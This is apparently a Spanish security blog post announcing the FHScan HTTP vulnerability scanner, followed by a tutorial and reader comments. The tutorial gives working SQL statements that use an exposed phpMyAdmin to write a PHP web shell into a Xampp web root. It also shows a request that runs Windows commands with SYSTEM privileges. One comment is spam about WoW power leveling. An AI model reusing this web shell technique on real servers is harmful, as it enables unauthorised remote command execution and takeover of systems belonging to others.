Random IRC quote :      <dab> pasan cosas flipanticas

Fast HTTP Vulnerability Scanner v1.1

Después de bastante esfuerzo, he publicado la version estable tanto de la librería de Fhscan como del scanner. Están disponibles para su descarga en http://www.tarasco.org/security/FHScan_Fast_HTTP_Vulnerability_Scanner/index.html.

Fast HTTP Vulnerability Scanner

Entre los cambios principales en el motor HTTP tenemos el de estabilidad, soporte de file mappings para el almacenamiento de peticiones HTTP en disco en vez de en memoria (lo cual provocaba altos usos de cpu al descargar ficheros grandes, control de ancho de banda, soporte de proxy HTTP, establecimiento de parámetros de configuracion globales para la api (por ejemplo para la configuración de proxy).

El cliente por otro lado contiene firmas actualizadas de más modelos de dispositivos, mejora del motor de fingerprinting, detección de proxys HTTP y varias vulnerabilidades en servidores web.

En nuestra sección hacking for dummies, vamos a comentar como explotar una de las vulnerabilidades mas comunes que nos vamos a encontrar escaneando la red, los servidores phpmyadmin.

Dado que FhScan realiza ataques de fuerza bruta, en muchas ocasiones encontraremos en el reporte de vulnerabilidades la contraseña de un directorio /phpmyadmin/ o incluso el propio directorio phpmyadmin sin contraseña. Si además tenemos la suerte de que el servidor Apache que soporta la aplicación corre bajo win32, como suele ocurrir con los usuarios que instalan el paquete Xampp, el servidor Apache correrá con los privilegios de SYSTEM en el sistema.

Para poder acceder al sistema, utilizaremos el interfaz sql para subir un script en php al sistema.

CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $out = shell_exec($_GET["cmd"]." 2>&1");echo "<pre>$out</pre>"; ?>');

SELECT * INTO OUTFILE 'C:/xampp/htdocs/xampp/shell.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

phpmyadmin upload shell

En nuestro ejemplo hemos utilizado el directorio c:\xampp\htdocs\xampp , pero un directorio real lo podemos obtener ejecutando /phpmyadmin/phpinfo.php

Si todo ha salido correctamente, podremos ejecutar peticiones de la forma http://host/phpmyadmin/shell.php?cmd=cmd.exe+/c+dir y todos los comandos se ejecutarán con privilegios de administrador.

Por supuesto, junto con nuestra php shell, podemos subir cualquier otro script , como por ejemplo un file browser en php que permita transferir ficheros de forma más cómoda.

7 Comentarios para “Fast HTTP Vulnerability Scanner v1.1”

  1. Comment por Raimon | 01/22/09 at 5:55 am

    No he entendido ni jota.
    Tengo el confiker que va por la red http, con esa aplicación me lo desinfecta?
    Gracias por adelantado.
    Raimon

  2. Comment por Boken | 01/22/09 at 9:52 am

    Muy bueno el escaner. Felicidades!!

    Tengo una duda, hay posibilidad de poner un proxy, pero no veo la opcion de establecer nombre de usuario y password para el proxy. ¿Como lo configuro?

    Saludos.

  3. Comment por andres Tarasco | 01/28/09 at 8:16 am

    Hola Boken,

    El soporte de autenticación en el proxy HTTP es una de las cosas que tengo pendientes de implementar en la libreria de HTTP. Para ello debo probar diferentes proxys para implementarlo y comprobar que todo funciona correctamente.

    No debería ser complicado. En un par de semanas debería estar soportado.

  4. Comment por jackepc | 01/28/09 at 9:09 pm

    Lo he probado escaneando en una red local y funciona bien pero cuando escaneo rangos de telefonica elegidos aleatoriamente no siempre muestra los datos correctos, es decir, reescaneo ese mismo rango y no suelta lo mismo siempre.
    Tampoco lo he probado mucho no me hagas mucho caso, fue solo un rato una tarde.
    Quizas no tengo mucha paciencia?, muestra el escaneo de golpe al finalizar? lo muestra secuencialmente?.
    Mañana lo probare con más detenimiento ya que creo que es una herramienta bastante util.

  5. Comment por andres Tarasco | 02/01/09 at 8:50 am

    El interfaz gráfico ejecuta la aplicación de consola FHScan (que esta bastante probada) y muestra los resultados, pero es posible que no los interprete correctamente.. Lo revisaré. Para asegurarte, puedes revisar los logs en html que se generan.

    Con respecto a los resultados del escaneo debes tener en cuenta que:

    a) Windows XP no lleva demasiado bien demasiadas conexiones concurrentes. Si usas este sistema operativo, deberías configurar FhScan para usar únicamente 9 threads. Con windows 2000 o Windows 2003 el escaneo con 64 threads funciona correctamente.

    b) Ciertas implementaciones de HTTP de routers adsl son muy pobres y no siempre responden correctamente ante peticiones HTTP. Por ello es posible que dos peticiones realizadas en momentos diferentes tengan o no respuesta. En cualquier caso, estos servidores son ignorados por FhScan (devuelven un error 400)

    c) Dado que los usuarios de ADSL se encuentran habitualmente descargando datos (emule, bittorrent,…) En el caso de disponer de una conexion saturada, es probable que la peticion HTTP devuelve timeout y por ello no quede registrado el servidor web en el escaneo.

  6. Comment por mybook | 03/16/10 at 4:43 am

    Combat
    5 points in wow power leveling Lightning Reflexes
    2 points in Sinister Strike
    3 points in Backstab
    4 points in Dagger/Dual wow power leveling Wield Specialization
    Next thing we want to focus on is equipment that you can use at level 30. I’m not going to tell you which wow gold equipment you must have as long as you remember you want to have high DPS and a good crit chance. Any equipment that helps out that bottom line aion power leveling would be good to use.
    Now we are off to the different grinding spots!
    30-34 – You have a couple of different choices here. Vul’Gor Ogre Mound in Duskwood (west of the road leading to STV), you aion gold could also grind on the Tigers and Panthers while doing the mastery quests from Nesingwary’s Camp in STV (of course, cheap wow power leveling you might buy wow power leveling be ganked a lot.), Last but not least there is you can grind on the tons of animals there and also get tons of leather warcraft gold from skinning.

  7. Comment por berna muñoz | 01/07/11 at 1:05 pm

    Estoy probando tu herramienta y me ha surgido un problema y es que desde un equipo seleccionando un rango de direcciones ip me escanea todo el rango sin problemas, peró en cambio desde otro equipo me empieza a escanear y al tercer host encontrado se para. la carpeta del proyecto es la misma y la conexión de red lo he probado desde el mismo punto.

    Podrias indicarme si es problema de alguna libreria que utiliza la aplicación de recursos del sistema.

    Los dos equipos son windows xp sp3.

Se han cerrado los comentarios